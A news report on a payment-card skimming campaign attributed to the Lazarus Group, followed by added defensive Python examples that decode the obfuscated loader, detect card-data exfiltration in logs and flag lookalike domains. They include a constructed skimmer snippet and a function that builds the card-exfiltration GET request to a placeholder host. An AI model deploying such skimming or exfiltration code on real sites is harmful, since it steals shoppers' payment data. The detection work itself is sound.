Lazarus Group suspected of stealing payment card data from customers in the USA and Europe


Sansec researchers have reported a large-scale campaign to steal payment card data from customers of large retailers in the US and Europe. The researchers suspect the Lazarus Group (also known as Hidden Cobra) is behind the fraud; the criminals abused compromised legitimate websites both to steal credit card information and to disguise the resulting traffic.

According to the researchers, the web skimmers were loaded from domains that the criminals had already used in successful phishing attacks. The list of victims includes dozens of stores, among them large companies such as Claire’s, Wongs Jewelers, Focus Camera, Paper Source, Jit Truck Parts, CBD Armor, Microbattery and Realchems.

To cover their tracks, the criminals break into the websites of legitimate businesses and use them as drop points for the stolen data. Sites hacked for this purpose included those of the Italian modeling agency Lux Model Agency, a bookstore in New Jersey and an old music store in Tehran.

Another Lazarus tactic was registering domain names that resemble those of real stores.

In June 2019, Sansec discovered a skimmer on the website of an American truck parts store; it used the hacked website of the Italian modeling agency as the collection point for payment data. The injected script, customize-gtag.min.js, had been run through a JavaScript obfuscator (obfuscated, not encrypted). Concealed in the code was the string WTJ4cFpXNTBWRzlyWlc0OQ==, which is used as the HTTP GET parameter under which the stolen data is sent to the hacked site; decoding it twice as base64 yields clientToken=.

The malware was removed within 24 hours of appearing, but a week later it was back on the same store's pages. This time it used the New Jersey bookstore as the drop point for the stolen credit card information.
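The two technical details above (an exfiltration parameter name hidden as a double base64 literal, and card data sent as a GET to a third-party site) are what a responder triages first. The following is an added example, not code from Sansec or from the skimmer itself: it peels nested base64 literals out of a constructed loader snippet modelled on the description, then rebuilds and flags the kind of exfiltration request such a skimmer fires. The host example.invalid, the variable names and the card record are assumptions; only the WTJ4cFpXNTBWRzlyWlc0OQ== string comes from the report.

```python
import base64
import binascii
import json
import re
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed sample modelled on the loader described in the article: an
# obfuscated script whose exfiltration endpoint and parameter name are
# stored as base64 literals (the parameter name is encoded twice).
# example.invalid is a placeholder, not one of the hacked sites in the report.
SAMPLE_JS = r"""
var _0x1f=['WTJ4cFpXNTBWRzlyWlc0OQ==','aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvZ3RhZy5naWY=','length','value'];
function q(s){return atob(s);}
new Image().src=q(_0x1f[1])+'?'+q(q(_0x1f[0]))+btoa(JSON.stringify(d));
"""

QUOTED_B64 = re.compile(r"['\"]([A-Za-z0-9+/]{8,}={0,2})['\"]")
B64_SHAPE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def peel_base64(token, max_layers=5):
    """Decode repeatedly while each layer is printable ASCII; return (innermost text, layers)."""
    text, layers = token, 0
    while layers < max_layers and len(text) % 4 == 0 and B64_SHAPE.fullmatch(text):
        try:
            decoded = base64.b64decode(text, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            break
        if not decoded.isprintable():
            break
        text, layers = decoded, layers + 1
    return text, layers


def hidden_strings(js):
    """Map every base64-looking quoted literal in a script to (decoded text, nesting depth)."""
    return {m.group(1): peel_base64(m.group(1)) for m in QUOTED_B64.finditer(js)}


def exfil_request(endpoint, param, record):
    """Build the GET such a skimmer fires: the card record as base64 JSON in one query value."""
    payload = base64.b64encode(json.dumps(record).encode()).decode()
    return endpoint + "?" + urlencode({param: payload})


PAN_RUN = re.compile(r"\b\d{13,19}\b")  # card numbers are 13 to 19 digits


def looks_like_card_exfil(url):
    """True if any query value base64-decodes to text containing a PAN-length digit run."""
    for values in parse_qs(urlparse(url).query).values():
        for value in values:
            padded = value + "=" * (-len(value) % 4)
            try:
                text = base64.b64decode(padded, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                continue
            if PAN_RUN.search(text):
                return True
    return False


if __name__ == "__main__":
    found = hidden_strings(SAMPLE_JS)
    for literal, (plain, depth) in found.items():
        print(f"{literal[:12]}... -> {plain!r} ({depth} base64 layer(s))")
    endpoint = found["aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvZ3RhZy5naWY="][0]
    param = found["WTJ4cFpXNTBWRzlyWlc0OQ=="][0].rstrip("=")
    # Constructed card record; the PAN is a well-known test number, not real data.
    url = exfil_request(endpoint, param, {"cc": "4111111111111111", "exp": "12/24", "cvv": "123"})
    print(url)
    print("flagged:", looks_like_card_exfil(url))
```

The decoder stops as soon as a layer is no longer printable ASCII or no longer shaped like base64, which is why the parameter name comes back as clientToken= after two layers while the endpoint URL stops after one. The request check is deliberately coarse (any base64 query value holding a 13 to 19 digit run) and is meant for triage of proxy or CDN logs from a checkout page, where legitimate requests rarely carry a full card number in a GET parameter.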

In February and March 2020, several domain names resembling popular consumer brands (PAPERS0URCE.COM, FOCUSCAMERE.COM and CLAIRES-ASSETS.COM) were registered. The researchers subsequently found that the online stores of the three corresponding brands had been compromised and infected with malware that harvests payment information.
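The three registrations above illustrate the usual tricks: a digit standing in for a letter (0 for o), a one-letter typo, and the brand name with an extra token appended. As an added example (not from Sansec or the report), the following check flags script or request hosts of that shape against a store's own domains, the kind of check a store can run over the hosts loaded on its checkout page or allowed by its Content-Security-Policy. The brand list and the sample hosts are constructed; the public-suffix handling is deliberately naive and noted as such.

```python
import re

# Constructed allowlist: domains the store operator legitimately controls.
BRAND_DOMAINS = ["papersource.com", "focuscamera.com", "claires.com"]

# Digits that are routinely substituted for letters in lookalike registrations.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s"})


def levenshtein(a, b):
    """Edit distance between two strings (classic dynamic-programming form)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(host):
    """Last two labels of a hostname. Naive: a real check uses the Public Suffix List (co.uk etc.)."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def lookalike_reason(host, brands=BRAND_DOMAINS):
    """Return why a host resembles a brand domain, or None if it is the brand itself or unrelated."""
    dom = registrable(host)
    if dom in brands:
        return None
    label, tld = dom.rsplit(".", 1)
    for brand in brands:
        brand_label, brand_tld = brand.rsplit(".", 1)
        if label.translate(HOMOGLYPHS) == brand_label and tld == brand_tld:
            return f"homoglyph of {brand}"
        if levenshtein(label, brand_label) <= 1:
            return f"one edit from {brand}"
        if brand_label in label.split("-"):
            return f"brand name embedded in {dom} (cf. {brand})"
    return None


def audit_hosts(hosts, brands=BRAND_DOMAINS):
    """Map each flagged host to its reason; hosts that are fine are left out."""
    results = {}
    for host in hosts:
        reason = lookalike_reason(host, brands)
        if reason:
            results[host] = reason
    return results


if __name__ == "__main__":
    # Constructed list of hosts as they might appear in a checkout page's script tags.
    seen = ["www.papersource.com", "cdn.shopify.com", "papers0urce.com",
            "focuscamere.com", "static.claires-assets.com"]
    for host, reason in audit_hosts(seen).items():
        print(f"{host}: {reason}")
```

Because the comparison is on the registrable domain, a subdomain such as static.claires-assets.com is still caught. The check is a screen, not proof: a flagged host needs the usual follow-up (registration date, who serves the content, whether the store's own deployment references it), and a domain that passes the screen can still be malicious, so the allowlist, not this heuristic, is what a CSP should enforce.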

All three cases shared the same infrastructure and a particular piece of code that the researchers had never seen before.

The researchers acknowledge that these attacks could be the work of other criminals, but consider it unlikely that several groups controlled the same hacked websites at the same time: attackers normally keep a compromised site for their own use and shut other criminals out of the vulnerabilities they exploited.

